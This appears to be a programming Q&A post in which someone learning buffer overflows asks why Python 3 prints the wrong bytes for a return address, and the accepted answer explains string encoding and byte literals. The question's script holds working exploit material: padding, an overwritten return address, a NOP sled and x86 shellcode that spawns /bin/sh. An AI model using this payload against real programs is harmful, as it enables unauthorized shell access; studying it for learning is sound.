# Python - Printing hex data shows wrong values

Tags: python, buffer-overflow

Im researching buffer overflows, and im trying to write a small exploit, and i need to append the address of RIP after the padding, the problem is that the address of RIP isnt correct when i try to run the script (output it to a bin file and hexdump it), here is my code:

```
#!/bin/python

sig = '2'
pad = '\x41' * 73
rip = '\xb8\xdf\xff\xff\xff\x7f'
shellcode = "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nop = '\x90' * 100


#code = sig + pad + rip
#code = pad + rip + shellcode + nop

print(rip) # Shows 00000000  c2 b8 c3 9f c3 bf c3 bf  c3 bf 7f 0a  |............| instead of rip (0x7fffffffdfb8 => b8 df ff ff ff 7f)

#print(code)
```

Why is RIP not correct ?
Ive also tried to print out just \xb8 but i got:

```
00000000  c2 b8 0a                                          |...|
```

why is that 0xc2 added ?

thank you

Answer (score 4, accepted):

You seem to be using Python 3, so string literals are Unicode, which means when you `print` a string the bytes you get back are encoded with whatever string encoding Python [decides is correct for your environment](https://docs.python.org/3/library/sys.html#sys.stdout): `sys.getdefaultencoding()` will tell you the encoding it uses by default. In this case you're getting the UTF-8 encoding of `U+00B8 CEDILLA` as the first two bytes of output for instance.

You probably want to use [bytes](https://docs.python.org/3/library/functions.html#func-bytes) instead:

```py
rip = b'\xb8\xdf\xff\xff\xff\x7f'
```